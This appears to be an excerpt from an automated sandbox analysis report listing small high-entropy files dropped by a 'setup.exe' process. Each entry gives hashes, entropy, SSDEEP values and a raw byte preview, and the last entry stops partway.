              Preview:<?xml.|.......G.p.....cc.9....NIW.M..1...QW.$n..f.;.....u.5.+.N....J..%:..*.8...w..Z_.0.......i.]O.&..5....h......#]..Z46...P.=H~e..o.D.u..!..}..1..jr.O....`/z...y....6.O%...(x...~.......t.#.{.S_:A3W...8?......Ng.pe.A..|..G...D............G.....l..=.....:.."h...q.J..I5.....H-)...C..gM8..W...%D......C....u...|v.K.a.........8.^6.....Y.F.t.G.=..SC.A.W.j...i..L^.Xk...j.B.......:]<....wRj(3~..@..r.....g.Z.__........1\...KAjyE..}..U......EB.;.G.9.a&i|Fh-!6.s.f....}./...iXS.-.T.q4(au....a}...5.]b.8..u8.b.z....;N.-.e.@.(..k........Ez.....L.o(Hh.....G...P.z..JS...=.ZyTe.k..Z.?F.....J.Hs.;,.D.*E...#pC....D.z!.B$.....1....)G.3~... .Z..........Z.[G.+,............et.|.g..@...5..>.V.#..(.<(.i{........w")..^i50....Y.;g.....e.2}M~Z>D.4..Q...5.d#.@Q.L..u../*A).......{.%q.[8......%..Z.0Q7"...vv`.}.J...8.QL...l...@....p_...S..G@.....o..A.'....c.W.A.j...6..*S.\......;.zUz..5.r...^S.'I...Y....E...M9.alP...J..>.4g.07......*%.}o}R.|.Uz.U....tE..X...Nn.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1738
              Entropy (8bit):7.889895853512683
              Encrypted:false
              SSDEEP:48:AXNAwW75rYCpH2R1BYQsVvlG54hYA53aLxLp8D:WNAwW75rH0R1hsVdG5VA53Mx94
              MD5:58A8BF1AD60E1CD4151D9833934E41DD
              SHA1:CC0E69ACDDADF15515C937E8390487074D97F3B3
              SHA-256:EA110B1335CB2063904D918B6E3A3E64285E613F8CAA408159F95EEB2CEEB74D
              SHA-512:35D74115C92E5EE6D32609EDB838E61A9593308A534073B93306911CBB9E1E5F5A6574E03E7E41AD14CEFF0F415B3FCABEB673CA2EE1FA277FFF7FE2A1126FA7
              Malicious:false
              Preview:<?xml..W....+../.M..~.T..M.w.d...........+".O..x...]u.U5b.S.....'a...@.....h.@%...@.Pu"..'fZ;.."y.x....t...W+.;.e......4.}P..2vH..[.}0}^.D.. ....?..?F.....C...f.A:H.m.Nr.3..h9.x...k.v...9~....A.3s.'K..8..+h....~...7.n;;uB>..e..5U.cs....{#.....D......A.X.^....3....4.1:.....".k.N..*...L...4......K...j.k.....H..9>P. .4.M...|.7!H%1.~...l...10I..P~....}.......)....\M..w.......`....&ah...HJ.O..H.r.[..%_J./...p%.6..~........n_.....p....,..........9.(..m<../}o..&:t......O.!.P..G.2\....."o.'.....4.zy..j...kwib.....h.X..0....I..M..d...s..l.C.z..l.....e......%....K..h..D*qt.......l.Ls.....Z....h.H......J!J.....PqH...y.h..).K.W.!.B.k.*0....).6.N....].c.caX|..h.c.S-?..&F...o.*...b....@.s..*k..6.f...o.Q.7..w.....)..9.]..%..\a...l....U2N...8M....U).O.L...OJ.&.j....4...a..-` ......^..?..m.....>...v.!}...Ai......D.....,.{C.&X\.../.!.VVjHv..;...a.M.... ].LLN.....8.0...q7/.wpQ.q.9......V.... t.i4......O.....a.[..y.Sz..uh.[..|[n ...`j}....6..j.$.a
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1689
              Entropy (8bit):7.88175810200503
              Encrypted:false
              SSDEEP:48:CCQTlF9cN7YqsuLSLPlz6tsFamtSMzO9dyED:C72N0qMLPl6tctsR
              MD5:822F5DF9092FA975770BC0C45C068B25
              SHA1:5220E735147BC96C60534252119210FD45B9A464
              SHA-256:6F50B515039D858D4DE000793A04340ECADEF299014552CAF5FEBA455F0D69F5
              SHA-512:4B25771FCDDE13184B38324D21524AE35C880152905C34C9A7A81186900EF13E21011EF53716C7240FD039F5446DCBEC60A250DACE24BF53E5C21C880A0B5D7D
              Malicious:false
              Preview:<?xml K....J.k..Z\....G.X..COi'.,.....j.k..oP^.."4.........."P...B...*...^.sB....l.m......g..4.X.={.=$...b..hI.F...%_........&..0..H.z_@.$....53>q.4..v..-.v....)v...y.Y]...ubR9/..s..m.E..H.o...............S...P..&..D....X..M.4A\Q.F..YT....~...J.*$......_.xm..i.......1...s.z.;ya.a...u......f......[..O..#.."..A.'6...U....p.:,...U.km....M.....[.xY J.G..LD-.&j.,;.x9...Oz..i..I.+7`..........c..m. "..../q...dy....-C&1l.. ..K.B...g.JB....y.2,Y6d../..'.{.=......OA..b.Y},....Q$.>..M*.....oH.!...j.~.A...b..1.....k...*......8.....i.cO....I.w....VGz^....7cr].}/...r,|......@.....,.N...7.-......Fp..VyPI.&...B..\.Yp-........~.U....Y....4.U..<....ty..(5`..pP..h4....'c.A.U.........RA.2|"3.}h....'.I......]=...U....n...V...g..[O'..F.%Uva....2..e....}..O...S...bh)B..U`2'....~.C..4.I...#,.a.....k.z.....04.p.s...f..,.cLP...TC...yr.h.......K.$.R5......UhA..\..6..A....,.P..z.Yl..\.....2u.....<.w........A........Yc.#'..{.z$.,V..5....f.....X(4.,$..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1726
              Entropy (8bit):7.888787362085632
              Encrypted:false
              SSDEEP:48:e9Kahmh+C9IqRJ0fQKlfEdhARblC+iM5dsMoEqYqGntXWNAJD:ohmhz9hJ0TlOh8blC+iM5KSsN0
              MD5:FE7BAC896759EE8C4140A172C5090C60
              SHA1:6B649BECA2CCC43B3ECC2A75C8A07DD84FA977BE
              SHA-256:D99CA90C7A3437B6893E5BDA943F7920A0872F495D877B49E1573C6E4A241F36
              SHA-512:EB64F9CCC896CF2582D8F028880F770A48A6935B80C4974E6E1D6AAB85B409C3E65DF857121AF175100197C0A13156CAC293757E8174D02DB49A56D88DB7F348
              Malicious:false
              Preview:<?xml...f-.....ff@E^ ...d.....Q^...Wf.Ru..>}.p(.. g..m..C.)'.Gl.... |*..r.....w^}..]....N...T..l .oRd5...u...j.$.Ct&*n..6=.S..or.X.z....3B.ElxZY...B...n.....[....?..l..'c...S.A.....2.v.....`...n..]J,.0t.....:_...;....2?.,.3.A.....d...5c....C.h.@....O.`......U7+?..#.......p..I.{..U..0.....ra.F.A.O.zj*..lOa....4,....i..B.|..&7%.}...-.7..O8..U...bS`-........M..]..14.....S!bJ.E.[....?..I,a.J..,.........r&........3b0. ......9KRGY.R..|.g.C....Y9.;.u..WlK.V(...s.4\C1.c...J...E..a.yw..v.........\hDBOpm.ZXT._...,.E8sa.6....&.j.lQ.5.t..MzB@.....N...KJ..*..l{.+..w...1.V?..k..v..w.;.2.kI{d_..=i....LR....i.!A...A.7.'..Y.(<..~?b.IyW.k. mv...Kw.,".o;.......Z..K.m.........U....O.0.@.c..a....?....e.....k<..~......V.A~..HW..e......P.U..L...T.....Y..#j!.`6.r..(t....y..(h...~.0%...J......!.)..=.nd.8..I.S...N'.z....I.,E..43w../p.E9!6Z....b.Z.:wL.3P..p>.X[..q...E..!...i..>8.}...z.h.{...].$..#..HE.-.[e......M.#(.....>../z.....\....U..&1;.[i..o.x..b..d.I%..JX
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1697
              Entropy (8bit):7.884241975982506
              Encrypted:false
              SSDEEP:48:ob1GYU1dy1jyN8LyRFmi2Wuzi1cL2pHmtera6aUKfD:ob8XGNyN8uUiqiaL++Q8
              MD5:EB33920E1ED85C0A124BE6ECA6675BBE
              SHA1:403EB6181028E38D22A0B00C44035D7D63FB68AA
              SHA-256:8C6EB0ADFFA8DA941A2A8BB1D2161DA70B91BCD0B96B74C7ADCEF3E2D08D107D
              SHA-512:4A0172AFECB78997483468DCEAAD1CE8746BEC7B7E6F90CD8A46859DC5A70EC39B5EF7894D829BD2DE40123C43488E28B059A43B17DD431F846C022BA3915550
              Malicious:false
              Preview:<?xml.......Q.....gj<..w.:..B..-.!...u.S.. ..w.....pv@....O\..Y..>.v.L.Qj^>.'..l.r....V.}.>N.=.!........t.{X..C....U...O..k`....R...8K..C.!z..zY.....|l..@C.............5..G.m.rz....n...$..*v....t.e...`@...K..."j~..+m..?.&.9....^..~Y.:.O.........G_.........H}..YQ;.....@iD.i....].`.G2S>....$.mk}..tKU..n|...W.B..f.....`.G\.g...&........H6.$.4...)...F8u.'3.{.........a..<..Lt...ZL..K.o.}nZ.B6.j.y.~.+xM.].....?Z.......ah.5.@.........}$.l..!...8..n|y....(..\.H..8.c%. .....u..m.$yOT..7....B.eS@....[.='...t(..s...M#B4(........oiS..%.V.gIQ..D...?....A.......Z...wCb.8%l.Zs.hv.....-R..%Z"\DJ.3...f...h...Z..[H..Y...y..Yl.on.Bmv4S.....u.E..SWn}....@.j....Q..6.D{.."}..<Q.ayP...$..)@.......Y.b(..7.ks..I.{....=..L....>.dR..j...5....i.xg.:.|N..........P.........e..ak"...m/.b...?..g..w..|...1.b..!...n../.....u. 58.'....8...*u0....,.(j..r=B7b.....+.u)uL..+.*W......R...'..i..u.f.."m..H............a....Emm=.6...T..6`[.......b...wf.#.~._...n.x.@.4
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1734
              Entropy (8bit):7.871968206247629
              Encrypted:false
              SSDEEP:48:QJ8U4vT4CImJW0sp1A3voBOAKhJ2yL2dw/5hiaD:m81T8WFU1A3QBOAKhJ2yThl
              MD5:A356626814B1C6402A48B490A88B392C
              SHA1:BD2D2DEB89A0827CD4471C17B0E5FED566111EE4
              SHA-256:1762AD05E2CC1565D0C8A5EB90C35B93B175ED9658CB4512A0EFDF8B84086A69
              SHA-512:2B65255DDB77F695BA5FF1A23FE0F9BDA80AD4B3CD30B94D4D273F1A8D1B4672EB829C6BF90DB5113EEF5F7E90EC228895FC82B680CA72A9AF0C1E13105E4F3E
              Malicious:false
              Preview:<?xml;.m...#.'.};...........*l.<..c.Ao+....Y..."YX...._...DF..*i...9..>]r..f..y..vq .L.F.3.."...P....,..X(...;z......|T%$de.f.'....D.=..^.+W}b\.....9(u...;...&....:...w.~.....M{ag.Snx.A{..._.ml..x.._.....?. .}....~q-gC.&..C.......i.K.u.....J.....}Lc......=..I...5..lE3.Y3N...Qz.>..F.|.Ny]......G..d.J...,.l.x..G....n]..1RO........5.....Xh..&{lU%.).Bq./z..0.#[<..I..O`.....b.."..v>..;A.D..V.&Z.._J0m..[PE.b.<.w.}.;....).(..2@..f........A.k9?...Dj..L.G.vx..$<O.Mk)....gVX..x...G.i}d.}P.H3.;6...3.........<4:.U0L......`.EMzq7.Z...-.z.F....~"`b.....3...x.4.....2..;..(&...0.lQ.`.2=#..c..F.e=c0.#x8.r$;h.R..w.......R1.......r8i...1....-}.|.:..T...<.a.....p..-w...<..C...[...9....kS#.V.DF...{@.}.$a.J.......?h.../!m....6....*.j.IX.5..W.......B..p...].....>.W.V#...EE..3j...u.}n\_..4.../.........j..g.c.u.R..5....*'d.tZ............u`.. .y8...@8.X.2..v#-q..{:..D........}qwEe........b.F;...*S.z.6.xqu .v|..+=.x.x....E..'T.I...7G.p.l.."...T,.....3UPhs
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1695
              Entropy (8bit):7.879829616411411
              Encrypted:false
              SSDEEP:48:1ikKcEun5IDLQC9ZaurLysWJWxcriACV3D:1PEmaXQC7TLys0Kc65
              MD5:2E51D8423431515F9805E2FF2529C515
              SHA1:34CB96B6E6A9BF000EEEC496822266B6FB96437D
              SHA-256:1D275EE6722668D8787DCCA03B95C5A4A23E8C9712B6B297682FFAF0ACE5D5C0
              SHA-512:7DB41904123E2A016A1E4CC401AE8A740EC57D2825CD89DF29EF37892C99A5143B989162E6E31E89F9A657E111D9C2EB9A554E779172BB7752C9E80336F5FC78
              Malicious:false
              Preview:<?xml..b.^V.}.N.f...7.'5.7...!C.c.KZ....$.k...m:?..AQ,.../...[...3.....s...aG..x..z$R.[ ..T4...3.M....;.Nt.o.....*..mq.......x..m..%.[n..y.S...3....$.!l.....=7.E.....e..UYj\..>...&S....#>...!....i.l.!.BYf...Pzy+.LH..2}..._R..mi..G.{...D....+I..T;.."%k...r.0.....!,.Qm'/.*........M4K......O....]..h...g.....u.j.?.....lO... L>$........X...uQ......)..tW.W.ek........2..S,.D.......7{..+.5.;...sI....Ae...K...7.X.....-Ad..0..=8.j...O^.E.[M.i_....(...[.?/.O..d....'...{.U..C..=hnY..t...8hg...f.&.G.8.q.$.....I"d.._._!0....Ts.9../cd...tw........T.C......6V`;8OU.._..=.RW.....?D....l,>h..O..*..55.8.?i.+'....Is.,..e.=.,z\..J.S.x....`*W-p..y...8...h.Q..V..b\...HD..#.C.Cf....B..k....1.R4...\.wO..&.vF.>.=..Y5.Q..h..).....>.l....5W....7.....^R..|\q.<N..5x.P.C........3..-N.(8.h....&.C....|.Q.'%._8....V.A...o.J.7..me.%..Z.........../...&..1U~.c#m.$...uK(...hk<.2b...qj.......Q....>6.$1.e.j4gQ<0r.J..oY...L...d..'U|o..^..r../.b.f....nfq..t..o>[.H..0.[..:.c*Z
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1732
              Entropy (8bit):7.8905625295082435
              Encrypted:false
              SSDEEP:48:mAB5blBdQR0B7RnfGhZOTh0/7rXGRtruTQD:mAFCSn+i92boATM
              MD5:A871C904311EF6505302C2747BB9B0CC
              SHA1:7842DDED4CD9FFF8987F9652D7C063EF0E26A661
              SHA-256:FD531381258C32C5A566E6F90E8115482D72535470EB676129B4D57B5EBDA6BC
              SHA-512:DFA13DD21461DCAC8E0DC4923E36D269E3673ADC4B31F3FCE6D1087C4997A806401D303F9A104095188A0640E245C7567FCFE722C6F54F4FA86D38AFCC8280D0
              Malicious:false
              Preview:<?xml.{.x;..l.p..m...g....c.......l3..1.......#...Y..ur......%FYO.].y..._.k.[..R.s..N.........%c.cQlYC..O..PU...^..S..^../...z..v...C.U....i..[.J.+..e...P.v...w.7B.q.w....Wij...fG..bk.3....c.Bd....G.R8...J;.......G.t:..=....2!..q......1/i.....S$...M.F...d..9x.~4...W..nD._|.S..&P..Y#.eL.H..E...I.&....*....1"..B..".....Wb..2.%.W..)..-..d.z.Z.U~ih./.-4[.2..:>...%].\./....&.,..=..#..YZ.0.:..e........\.E...W../t\.7^......%q..v+........c...'.....!0^K.yE..u.. R.cd.A...8.....q/...}3......<'..P....F:.J...W.k...1.....dd..e.t.n.......*P.f..A.1...Ti...........5R.D...[..u.../8nnR.'4.j.......w.B1...[.....M....z%$?U..|.UhP.f.&O/D~^.nT.J5....I.%+..k.g.1R......i.M..y"[!o$...^...j.^.e.....J..%/./..Yvt.8.*..NN".....E.~.%...8..D...6fv..[.s.....|m....E'$A...H.D.J.... ...[..V.Ra....m.._...b..s.V......[x.J...H.B..Nw.Jv5.Z'i.@X|./.vX. .,0...I.D.}.....\.p....*...9.....T..;.[..Gy.Q...l.....FZ....\..V.@X..Yi...[pw...hK...5.....&...4.@.q...{w9r.q.0T..J\.G...Vg..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1697
              Entropy (8bit):7.889632194318903
              Encrypted:false
              SSDEEP:48:N+XmkPec3IvCk6fHwb/77rBWMwMp7ezn4J07D:2ec3I7Kwb/nroZMpCz4G3
              MD5:B40CA66BEDEE96D2163234063FB2C706
              SHA1:4EC622E9CC3CDA63A4C6E07F9820D2250ADE362E
              SHA-256:3909E6386DF73F61067240F0B321794717B208E3090998FA26D81759BDC56E17
              SHA-512:839B40A58F9CE7E9BF5F1F7B410150E634D9143B570CFBFD47BB765D1930DC07F10A3F3BB9248573C5CF79E1C92E4CD7F71716EBC9E2111E11602B79C4517837
              Malicious:false
              Preview:<?xml.......v..$..B.g..:M/.h..Hp....34n=.t.........]M>..2{s...[..X. .......~&(^...i$`.8..l..P..dQ~:.*...uS.!(]"..v+..op.=.t~.}..@...S%9f.I.%...wJ..!..G.{6...;..Qn..l.?....x.J....\q..X..H..D4T.~/.tTe.v'.\x\..//,GA.l...^..d...5#i..-R$...........:....V..a..&.....,....?.h.s..B.C.F4l.......o..D..K......$K|....=z.Y.=.=15.3\..7.A..(....D.-B<]E.B..".=U..[..Ts\<......)...A.....ds%c..T..,.Pb.............3.h..hN.mJ.E.t#x..i.8#.........BD_.N+.U.+f.3.\1...V9..>....e..,\m..}e?.....]D.........zHs:.^......2tL>..pY..RQG.G...J.2.W.'~..?.p..A.V..8.W.. [AU.Fg...y.....2'...>.c.n.#2Y...#.b.r....f|h_.4.....>....&........H.*J.9;.Q.9..*.gn.J..s..F^.:.LY..s.aR1.(...ECi#.H6.x..n...E..w[..F..[..$C.^l.(.....s....o8.8..../.5z.S.&PVq...A.pue%.q%,.>...~...^ys.5:_.QG....._O..6.ps,.]=/xz...v..[...$.+.....%......zY....I.....0VlJ.Z....G8..a.......@w.B....P'..d.v...uTLG..t.l.t..K...h..zt...........b......s.....s(UDX/..Ov[>..H.bBMN...q..m@.?........'(..JJ..O.....o.z...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1734
              Entropy (8bit):7.897492074160254
              Encrypted:false
              SSDEEP:48:tWEUuz9AcYFe17T4vtEkQjT/fn4/7LWrD:rzMFeGvtEkQjD/4/i
              MD5:7A25AC244B38774DF28A24F577A0EC71
              SHA1:0D630C375FC8C2A37C9A7F75D9D2994C51BE0AE8
              SHA-256:3ED1EE7DF8BC1E714FBFFF256777101E4BEDC907FDB22B258F8EA6E32DECA905
              SHA-512:1DA8FF5679E5018344EF9F8BB2171C718DE2677A9736789BDA7531E18877F68E8D4E2BF3C52689B1F31B91226D571F54721B127C608E7C718B202AB398371976
              Malicious:false
              Preview:<?xml....U..#...l..K;.UQt.C.7.0b.a...^.-V.eE..h.3.{..MCpC.P8..?..#W..d.Y..].)x4..$..".z...[N..Rp.U..i.!]i....K....Q.5+.......\B5..Dj42.YV5.'.|W.S.G...AY...]4.b...z.WY..7a..X3...W.ipC.GpS.....T@DD.Z......J.u..S......9A.....`.'.&?.I..w..kwZ=r=.....kg..;`..y..X....T....ka4.j..*.z.W......X....[B.q".[.H...5.D...e...a~.S..........:..g.>l..R.....:..J...].'6](}.g*$..%_.r..,...8d..'.;....l.).._.....uI.#......{tJ.p..v........;}X...4...0.t...|......Y.i.^]..B...p....zq..8.H.......6.z.p..8=...?./ u.rdW.....>.,.v.E.Vo..'T...PT.'..:..>7o......5.?..+.fk..Yo..t.M...[^.u....c..."......~.....r0.W]wJ#X...N.ab..."~NH..]8&.N...W..5."..ib.\.t..b>. 5.8"...Q=....f........l\^.*...]...2bn._.:..c...YA..w.{..._=...S.b...bmQe..A=..:..(.|.}........i.@0...(..>%=Z..W......cO`.M..}{..!...Y.......C+T..SjM._g....s.....5_e..Hvl..(..Z.F..T...A!.]K......_.*'.Sq..d..z..g.V....!.e.*K*bw.$0.,.cg.U.H..H.[.B.....@%...'..2.....7...B.$..GS#.(...cph%v.Q.b...._.e.>3...,!>..q....j>.:M.T
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1710
              Entropy (8bit):7.903867967763118
              Encrypted:false
              SSDEEP:24:gB+RbzaC7i048FvuzSrtmlsyupeCoVHjqByJaBUpLXNDYjPR+3dRecbD:gB6uOP48pgSrtmdup02YaBI0PRMD
              MD5:699B64A7AF5696239B052CF23454BDE6
              SHA1:977335626A663F8974736F421262834FF95E28D3
              SHA-256:B09461F7DAF533298CFF9105A7DA5CF9EF21B81CD44C63D9B0DA654B35E4B1EB
              SHA-512:D68FD1C5C8F4FEB7E43D40EF457B2D64CB161F59252F48988ED0F1B55B0BAFA5DD9C4AEFE6C74B73289D6D5E9F7D60A15C0A1377CB2F9DA8E4C8B76B053372AA
              Malicious:false
              Preview:<?xml..........J/...5B.eo.5......>W..K.....[jEf&n.. ............a..c.....=.....!a.....k.z|A..Yv..C...;...6..gB.`?..qLxA..7e../.z.;.kn...T.".*8...T...J.Cu:Oy....|:..N&.DYO.i...M...hB..#.>J.....c.1...r..x...O.j......r.r....+.tw.y....t....k.-....6.x....!...|.H..............2..B...>.\F...A.....X.."....-....%...Z.?....o.5.[ng.../.@...\3w*..#.....Ne..s2.C.[.d...eE.qI].<...aP+r..a...i.H.....b..P~.:.....:.1WO....^..EGo...?@s./\K.F>S.%..uqmv..nt.X..u...1......A_.7QX..y..z<.s....>..<sZ..Z.5.I.....t..J..\W.....ik..T.........D...."z...T..b%.....m..7f|...!?. .3Z.[.V..X.y..GG&.)...._$..6h....u.....A...{...N.9N.\@yQ..)...M6.(%.J....lj.%X.6F....p.4..^........e..S..j"R.f.W. ..87..,..:.w..m.......V.*,E.&.lg..Y#j?..E...}fm.........H$..6!$...M^.f.=..W.Q..N...l...m.2.~.._".....b..EWC..I0Q....B`....[|]HwI.Q..+.u...n..Ql..G.....B.1..5.....9...9....P..j.'..T....J.n4D.*.D.}..!.........y7`......I.gD...!BbZ.?........%.T...p;..r.2...g...7......$U.S*.....a.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1747
              Entropy (8bit):7.89864198276351
              Encrypted:false
              SSDEEP:48:Q/gF7qydUAw2d/9LbUal4sL0Ava29gm5JVmvu5HD:IRyKAwi9fjjLK29guJVmvu5j
              MD5:40382BF26EABFF46A92453DE1796FF05
              SHA1:D3AFA33A84FC46A2C6F9C13DF8AED20F1983D2DC
              SHA-256:26EF79D9746AF48B4498BDCC6F248166E129D54227A379F914DB4D35E0AFA365
              SHA-512:7CA6D0600D7113BDA8A8DB0661B714B6E48C2D5EF768C42F9B09B6D3E16AC3E34DA0BA272B2D5833D4D6E9E2BE2C1F6909A189849B922031F83E2913BBD9F913
              Malicious:false
              Preview:<?xml....K:-....B.YA...;b...Hz.Sd.E.......*Y...{....6..>...'.xi..)k....~Z..%....IE..$.....3C1.....E.1.#..P....5Z..<!..` .R.......fs..uc....tZ..`..W..X.P..g.h\@.$m@......`..F..]...8./.F.....$LZo..20...D.{m..'....*.[....ma.......L._?.NJ.......C.4.'.c.LR..J.7.[..;+n..1..M ?...t.FV.[..\...c....y......w...}."rSz..m*..).......o....."V..!>Np...s&...X...|.5ke..GC..}.]KNrU....?:.{...b....h....{.j.]..X.~(..;..x...;.....M...(..1.....i..l........X....]..OPLpa.D.w(..|.S{..I....H.....X}.W..d.bS......I.O...;...5\.;..:.%.ZX.|...Q........H......s..w.HW......5.>:5...:MtB<.7...'...|6.|Sn..`o./G .......:....QG|..2.3..Z$.s3...j.T......}...n..#DO....h.b.q.M......S...5.n.h.h...e.g.....;.....N.2.}T.BA..3.r...s....Q.2.dy0.N.E....l.5.$=5.ieKb.....\Kz....u..m...W.`.Y....>.4...*c8...#.6.f.!.....t.X...,P...k.. ]..>..^;......&.i-.{NE!..f..;..&..mu.ot.q....W.".)..fy. ..(.?...}.N.s.U.q7t0>q6...n..R{.G2t..Z.L..I>l....K..,...Zu.G.)#:]..T.wz..}..._.v.y..s.rP.M1Q.0..I.3
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1711
              Entropy (8bit):7.883173504293767
              Encrypted:false
              SSDEEP:48:HmJhk+lNUJQWqkdS273HaBZHoZI2kOwnQD:Hmfk+lNg5973HaBZHoJkOWM
              MD5:276DFFF0A4CAB909764D365C375ED2E1
              SHA1:6D153A3F5873D718E60D0C827EF23317B69C122C
              SHA-256:74002A407DB3BED441029FEA322C5BE783FF5A5482B4C55E4026FC99AEADE0DC
              SHA-512:60C78D094F6D360A6138B8AD1A3528C0D281CE00B3D101B3B2C397913A9DE25AB98133E9BE56AB894C10E94D57AED8631BB259DA4650F70C32D1D08B841A0567
              Malicious:false
              Preview:<?xml....,.[. vA..J.g....{SW.tuJ..O..(...r!.+...X..h...T ...*....Y.v..m...5..2..).K..9(CVN....i ..hV......c...YN....s&U%.T..}.2.p......`7.] ...t...j.E8S.8...7.......9t}.IU^.q. ....l...q.{N(.]B..H..[..N........N.".....d.}\=.FIl..D..Ri.....).k u~.L.d.X....b`...q.J..(...........=.6f6n........?..m{{......7.J<...9....f.~.y7H.....q*....k..8,..N...w}..r.FZ.I.'.GD.^z....4.d.5Ea..1+,~rf#..m.Q=.n.$5<y....&.W..x8....p.f.....@....)..C..|..\zHC..v.........;..6.......T..E..e....M....M.%.(..>...+..ujn....@....u.....L..]\i...AQ...X.....'..\G\.<..?;....^.C...?...8.=..z(&.s....c.n...(H....PJ.u>..e...d.Tj........ae..I.d4^R/.1....8.0..^e..g9.0^...,.."R....5~U..,t.B....-...?.n.......g...1.....8.........;..WlQ%./I.....?........7+g...l\.1w....-...}....`....0.......4.k..P..m.]=w.N.6...5.0.v..OO.n.)=u,......E.\....U......5<Y..,.K.....i.....cu-v.X>.....B..BW."y.H..'.[`.mH...v.da'....#V...L......^.6.......N......"vK.R}."<..6.=NEDx.<..iZ.....f$..&B4L...m}.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1748
              Entropy (8bit):7.894747276077379
              Encrypted:false
              SSDEEP:48:TIJvA2kr9xC9pfw/ni5rFTFQRdvWZHeDFwbuD:TMkJxC9pi6pFQjvWZ4
              MD5:8D34125616025E2D548435A354B9F163
              SHA1:09D698C692AB4E26458ED2627D2302372D7B3C09
              SHA-256:705752D84E5EBEF240059615015A3DDE8816AA009E6BB92720B645267CADDCB6
              SHA-512:1CDD48BACE6F8E4BE6C62E8E957BB20A7463879AD34D30950C1995D218D69C7F440EA8C0BF13BF42D5BEC7C5AA4FB188BF5E0EF7ACA645E2CAF96AAC37DC0C62
              Malicious:false
              Preview:<?xml..0.L.d:....n..P....Q[L..5.`..z.t.~.z7..QrM`...i.c...*`,.^..r...w*HE._.v...a..D.~T..A..>.>.5.........*6RR.8P....t.i...X..\......@`N ....0W3.]hN.K0..U..N..[...|7....#.....W%.}>...#T....&.q.z..I5~.....P=....-!I.#.8....~...N...RD=....p....n!R.%.y."...s..c+Q.:...U&.K..8..E..J..(.g....U..t;..mes..(....]..]..R.*..@{.S..v........HM....kxt...b.....0..lRig][.&....S9..k..+...8..k.g....k+.>.....x........CC......!4.i..N....{.`.]...-..<.Z. ...d..[..-..`..%...e...VZ.t$.....E..b..Wd....U...g...A9W.(.$.~=K<.8.`3..F..^fR.....li..,.....||.d.,.H8.)."...n....bv}....n....n,.P..D..E..n'.{..!.........fS.aN..tB..I..:P.a.=@.a..1..:........Vp.jBW....b.K+.....@..p.........Uc;...c...X..."........7..t.hi3.}\7...?..8>Z.._.a.`eI.'.....A..llK[.%..&.GI)qy..|...z.fO(.+k..i..\.u..a...j.E...l......F.}.\.9....fPo.....[.N....0.*.]....h..dz.CP..s>..{.).....r1$.s..[.s..O.Z.eF#.n...7B..w.U.s(....(.S..{.b.iW.G...10).,.-?O2y...a.v..51.....e..+.L%<|.....j...@.B....y.^D R.S...F5
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1704
              Entropy (8bit):7.888846912327251
              Encrypted:false
              SSDEEP:24:5jjd3wjvg67C6oIDeqeo322ZbHsA+U3GkVtWIphMSaR86UMqh/OERmAwYCmpbD:ZjFev/C6pLB3xZbmUjjN084S/OWmAwYD
              MD5:1C2F0D7E4D6C37DBEDB316B3D867E503
              SHA1:8A3DFD993BC2265E24A3F11362B57DC451704445
              SHA-256:FE61C9BE66F74D4BA98550F98010E87CBE0E74131B36CE2E9FB38151A2CF8386
              SHA-512:C47B7F99073FBD7B43C68DE7BDC8F3F9922788263DC4B95659871D910A2E093082E8BECE9836A36228821E39EA6795DBBE69899AB2C7D6691EAEFD86D0B6ECDC
              Malicious:false
              Preview:<?xml...h.I....j...4mL...2...i4}y?..D...2@.7.2.....g?....5 .\....~.P.K..)......D.W@.f.Q...-......$...e.U(C.b+{Y.L..';^?%.BD%..dz...3.:.m1k+6v.......ap....U.&Q.B..Wo.i2....mE,...a..Bk..?*...Ll.*B].../.....CkhN..w.........!..m...|1p3.D%./R9..G...V3).RO.n....~.S.0....E....4.K..YPP..{/.Zs.<..COl... .........w....{4....S>L..+..y.7l...G!6FTld.X....x.._....9B......!+Z.1/..H..|..d...'...2.h..@5r/<..`.a...l>_..._....].O.S:..N.v..\..`.zj.e...9.+..<.....8.$..3....M.m....n.,cy...SFA=7.T...)......[?R.~....0/.f...v/....yg.s....A...7....k.'p.8.D.....1..U|...[.v..D..h.....6...>z7:.w...G...b..I....B..b5..p.C..K..I.(.Dx..E8.M.&...2.[4.m.U.5..Z.......W..Ao]hW....G.".n.c}lh.i.P8t...[...b.'..\Q=..X....%6..D....U9$...Q.>G...F..s....I..?:..kK....5K3i.^z..6...;.ql..3...OA....mj...verET.R..6....[Z.;..l.|..\..[....V0B.H,C/X.d...V.@..(.bF...U..`...v<T0*O......y..|F......I...JM....Q..B.L.)..rbvd..........=...qgA.=. mz.MT.cQ.....c.!{.....6o<V..;9*..M2...L...!...v
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1741
              Entropy (8bit):7.900812466365161
              Encrypted:false
              SSDEEP:24:OHrgmFo2LYRuvgjrId51m/CrpyNhO9pJZ3/nQo71X/1evJfFwb1EGszfWB6ZIADR:OLFuIWrIr8wXZ3/QoT+uqGszvFuCD
              MD5:277688B83968616BF0047C3C06D96C31
              SHA1:C73DA548B74B88D182619F65052FCB3C7FBF8E31
              SHA-256:DA00BCCF3C580DD699F3691B8D04CAA0097BE32C2ADA993DEC468D04A93C8A60
